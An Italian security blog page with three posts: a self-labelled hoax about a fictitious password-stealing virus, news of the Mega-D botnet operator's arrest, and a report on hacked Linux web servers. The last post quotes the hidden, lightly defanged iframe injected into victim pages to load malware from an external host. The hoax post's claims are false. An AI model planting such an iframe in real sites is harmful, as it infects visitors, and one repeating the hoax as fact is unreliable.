il virus zyppi_ferox.w_32 ruba 345.800.000 password

Inserito da 10 Gennaio, 2012 (0) Commenti

Si tratta di :Bufale e Hoax

Attenzione si tratta di un virus pericoloso, attualmente la sua payload risiede su una botnet svedese… è stato creato per confessare e convertire coloro che da miscredenti condannano la nascita di nuove religioni. La nascita di questa rete dormiente ha generato una notevole allerta in tutti i siti specializzati. Il terrore della perdita dei propri dati e la conseguente violazione della privacy è da sempre un notevole problema sia in Italia che all’estero.

Un gruppo di hacker Russi devoti al culto della gallina morta ha creato una specie di web spider che sonda le vulnerabilità dei computer che si connettono ai 40 siti più influenti del pianeta. La lista dei siti infetti ed owned non è stata ancora divulgata.

Si tratterebbe di un attacco per difendere la libertà di religione. A titolo di esempio da pochi giorni è stata riconosciuta in Svezia la religione del file sharing questa non è una bufala è una religione di Stato.

Ma tornando ai creatori el virus zyppi_ferox.w_32, questi “crociati” del nuovo millennio hanno come unico obiettivo di  impossessarsi di tutte le vostre password, preferiscono quelle di twitter, ma mirano sopratutto alle password  di facebook.

Che fare ? si consiglia cambiare immediatamente tutte le password dal vostro computer e installare in modo permanete qualsiasi distribuzione LINUX, se gli hacker vedranno qualche OS diverso specialmente windows, devasteranno ogni spazio virtuale che vi appartiene… quindi attenzione…. ogni vostra minuscola briciola di identità virtuale verrà defacciata senza pietà.

Categories : Bufale e Hoax Tags : , , , , , , , , , , , , , , , , , ,

Arrestato Oleg Nikolaenko organizzatore della botnet Mega-D

Inserito da 9 Dicembre, 2010 (0) Commenti

Si tratta di :avvenimenti

Nikolaenko si trova in custodia in una prigione federale degli Stati Uniti, dove è stato arrestato mentre era in visita per turismo,
secondo l’FBI un terzo dello spam mondiale è opera di Oleg Nikolaenko, un ventitreenne russo organizzatore della botnet Mega-D.
Nokilaenko, conosciuto agli addetti con il nickname Docent, ha guadagnato in sei mesi più di mezzo milione di dollari, grazie alle proprie campagne di spamming.
Si stima che il russo abbia inviato 10 miliardi di email al giorno.

Categories : avvenimenti Tags : , , , , , , , , ,

Nuovo attacco ai server web Linux, botnet via iframe apache e nginx

Inserito da 15 Settembre, 2009 (0) Commenti

Si tratta di :Exploits

Denis Sinegubko, si occupa di sicurezza in Russia, ha scoperto un gruppo di circa 100 server Linux infetti (una botnet) interconnessi tra loro. Si tratta di un gruppo di server web infetti e connessi tra loro che diffondono malware, con lo scopo di creare una rete di computer (server web) che infettano i visitatori di siti web, questa attività è stata scoperta analizzando alcuni server con installato apache con password di root facili, combinando mediante la tecnica iframe server esterni con installato il server nginx si è potuto inserire con successo nelle pagine stringhe all’interno del server vittima fatte in questa maniera :

<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

Tale tecnica non fa altro che aumentare le macchine zombie.

Cosa avviene in parole semplici :

i server infetti osservati da Sinegubko legittimano il traffico web sulla porta 80,
la porta standard tcp per le connessioni al server. Il server rogue che gira avendo  installato nginx  potente server  http e un mail proxy  server sviluppato in russia da Igor Sysoev fa in modo che i computer degli utenti vengano infettati.
A complicare le cose e per aumentare la potenza virale ci si è messo pure l’aggiunta di reti basate su servizi che permettono la rintracciabilità di un computer in rete, ciò significa che esiste una rete di server tracciabile e una rete di computer che potenzialmente non avendo hosting fisso possono cambiare rapidamente dislocazione geografica.

Il tutto significa che nel momento in cui si lancia un comando alla botnet tutti i server infetti rispondono.

Secondo Sinegubko la responsabilità di tale diffusione è tutta degli amministratori di rete che mettono password poco sicure o che non proteggono il traffico di rete da eventuali sniffaggi di password di root.

Categories : Exploits Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,